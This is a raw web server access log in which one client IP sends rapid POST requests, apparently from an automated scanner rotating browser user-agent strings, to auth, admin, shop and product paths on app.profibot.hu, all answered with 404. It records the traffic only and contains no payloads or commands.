"/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:45:59 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/fr" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/signin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/callback" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/api/auth" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:00 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 